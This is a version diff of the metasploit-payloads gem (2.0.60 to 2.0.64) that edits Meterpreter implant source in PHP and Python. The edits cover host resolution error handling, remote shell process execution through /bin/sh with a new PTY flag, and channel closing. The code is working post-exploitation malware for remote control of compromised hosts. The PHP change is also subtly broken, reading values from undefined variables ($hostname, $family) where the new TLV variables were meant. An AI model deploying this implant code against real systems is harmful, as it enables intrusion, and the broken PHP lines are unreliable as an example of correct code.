metasploit-payloads 2.0.60 → 2.0.64

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: faaa7cd5f3fc34a0558e8e4a2d3a3891971173110871362aeec9541dc09364fb
-  data.tar.gz: 4f590294cd1f8aa71f6e83609882711b1e9accb0cd3bb0190a0991e221435b00
+  metadata.gz: 2f272266198457eb06192d32b735b1c22c32f6a722df20db02bd585e0f996a6b
+  data.tar.gz: e18a08cb3266b3dc44c769c0e8554887b6b1303eda27fee7c57bcac82d3c4cbc
 SHA512:
-  metadata.gz: 8c38ff1bed4972f8196fd7e3146ca59caffd7237d285c7273ab1ba045465250f0cf3dc04ccfde69257f0d2b6b40a0f723abab6323a93763153a29c725089bc6e
-  data.tar.gz: 2d388e3525a6110d12d5bc6cb791ee6a663c018836200485824d88b5cf21f0a4f39456c1483ae32b038e283cb39cd3348d6aa9103e8422812a0942c95277e9b6
+  metadata.gz: 867b63c6e25a79327f30e176c608c552b8e67135ed5c39a4d75145323f7d91653db857f4859431aa3f34e49190b6c7d7af89a827f36a2e68c42f6a8e14348704
+  data.tar.gz: 7cc1991f554d5b24c5859c28efef171e4bfe17a318d7e2aea670c581c59e1a48c3edba1cf172e35ed3aee97b394040a3b91a3e4189e90a4591792be3d390d795

data/data/meterpreter/ext_server_stdapi.php

@@ -461,7 +461,8 @@ function resolve_host($hostname, $family) {
     } elseif ($family == AF_INET6) {
         $dns_family = DNS_AAAA;
     } else {
-        throw new Exception('invalid family, must be AF_INET or AF_INET6');
+        my_print('invalid family, must be AF_INET or AF_INET6');
+        return NULL;
     }
 
     $dns = dns_get_record($hostname, $dns_family);
@@ -1224,15 +1225,18 @@ if (!function_exists('stdapi_net_resolve_host')) {
 register_command('stdapi_net_resolve_host', COMMAND_ID_STDAPI_NET_RESOLVE_HOST);
 function stdapi_net_resolve_host($req, &$pkt) {
     my_print("doing stdapi_net_resolve_host");
-    $hostname = packet_get_tlv($req, TLV_TYPE_HOST_NAME)['value'];
-    $family = packet_get_tlv($req, TLV_TYPE_ADDR_TYPE)['value'];
+    $hostname_tlv = packet_get_tlv($req, TLV_TYPE_HOST_NAME);
+    $hostname = $hostname['value'];
+    $family_tlv = packet_get_tlv($req, TLV_TYPE_ADDR_TYPE);
+    $family = $family['value'];
 
     if ($family == WIN_AF_INET) {
         $family = AF_INET;
     } elseif ($family == WIN_AF_INET6) {
         $family = AF_INET6;
     } else {
-        throw new Exception('invalid family');
+        my_print('invalid family, must be AF_INET or AF_INET6');
+        return ERROR_FAILURE;
     }
 
     $ret = ERROR_FAILURE;
@@ -1250,14 +1254,16 @@ if (!function_exists('stdapi_net_resolve_hosts')) {
 register_command('stdapi_net_resolve_hosts', COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS);
 function stdapi_net_resolve_hosts($req, &$pkt) {
     my_print("doing stdapi_net_resolve_hosts");
-    $family = packet_get_tlv($req, TLV_TYPE_ADDR_TYPE)['value'];
+    $family_tlv = packet_get_tlv($req, TLV_TYPE_ADDR_TYPE);
+    $family = $family_tlv['value'];
 
     if ($family == WIN_AF_INET) {
         $family = AF_INET;
     } elseif ($family == WIN_AF_INET6) {
         $family = AF_INET6;
     } else {
-        throw new Exception('invalid family');
+        my_print('invalid family, must be AF_INET or AF_INET6');
+        return ERROR_FAILURE;
     }
 
     $hostname_tlvs = packet_get_all_tlvs($req, TLV_TYPE_HOST_NAME);

data/data/meterpreter/ext_server_stdapi.py

@@ -662,6 +662,7 @@ PROCESS_EXECUTE_FLAG_CHANNELIZED = (1 << 1)
 PROCESS_EXECUTE_FLAG_SUSPENDED = (1 << 2)
 PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN = (1 << 3)
 PROCESS_EXECUTE_FLAG_SUBSHELL         = (1 << 6)
+PROCESS_EXECUTE_FLAG_PTY              = (1 << 7)
 
 PROCESS_ARCH_UNKNOWN = 0
 PROCESS_ARCH_X86 = 1
@@ -1146,6 +1147,8 @@ def stdapi_sys_process_close(request, response):
     proc_h_id = proc_h_id['value']
     if proc_h_id in meterpreter.processes:
         del meterpreter.processes[proc_h_id]
+    if not meterpreter.close_channel(proc_h_id):
+        return ERROR_FAILURE, response
     return ERROR_SUCCESS, response
 
 @register_function
@@ -1160,13 +1163,15 @@ def stdapi_sys_process_execute(request, response):
     if len(cmd) == 0:
         return ERROR_FAILURE, response
     if os.path.isfile('/bin/sh') and (flags & PROCESS_EXECUTE_FLAG_SUBSHELL):
-        args = ['/bin/sh', '-c', cmd, raw_args]
+        if raw_args:
+            cmd = cmd + ' ' + raw_args
+        args = ['/bin/sh', '-c', cmd]
     else:
         args = [cmd]
         args.extend(shlex.split(raw_args))
 
     if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
-        if has_pty:
+        if has_pty and (flags & PROCESS_EXECUTE_FLAG_PTY):
             master, slave = pty.openpty()
             if has_termios:
                 try:

data/data/meterpreter/meterpreter.py

@@ -1242,6 +1242,21 @@ class PythonMeterpreter(object):
         self.next_process_id += 1
         return idx
 
+    def close_channel(self, channel_id):
+        if channel_id not in self.channels:
+            return False
+        channel = self.channels[channel_id]
+        try:
+            channel.close()
+        except Exception:
+            debug_traceback('[-] failed to close channel id: ' + str(channel_id))
+            return False
+        del self.channels[channel_id]
+        if channel_id in self.interact_channels:
+            self.interact_channels.remove(channel_id)
+        debug_print('[*] closed and removed channel id: ' + str(channel_id))
+        return True
+
     def get_packet(self):
         pkt = self.transport.get_packet()
         if pkt is None and self.transport.should_retire:
@@ -1570,16 +1585,9 @@ class PythonMeterpreter(object):
 
     def _core_channel_close(self, request, response):
         channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
-        if channel_id not in self.channels:
+        if not self.close_channel(channel_id):
             return ERROR_FAILURE, response
-        channel = self.channels[channel_id]
-        status, response = channel.core_close(request, response)
-        if status == ERROR_SUCCESS:
-            del self.channels[channel_id]
-            if channel_id in self.interact_channels:
-                self.interact_channels.remove(channel_id)
-            debug_print('[*] closed and removed channel id: ' + str(channel_id))
-        return status, response
+        return ERROR_SUCCESS, response
 
     def _core_channel_eof(self, request, response):
         channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']

data/lib/metasploit-payloads/version.rb

@@ -1,6 +1,6 @@
 # -*- coding:binary -*-
 module MetasploitPayloads
-  VERSION = '2.0.60'
+  VERSION = '2.0.64'
 
   def self.version
     VERSION

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: metasploit-payloads
 version: !ruby/object:Gem::Version
-  version: 2.0.60
+  version: 2.0.64
 platform: ruby
 authors:
 - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
   EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
   9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2021-10-28 00:00:00.000000000 Z
+date: 2021-12-08 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake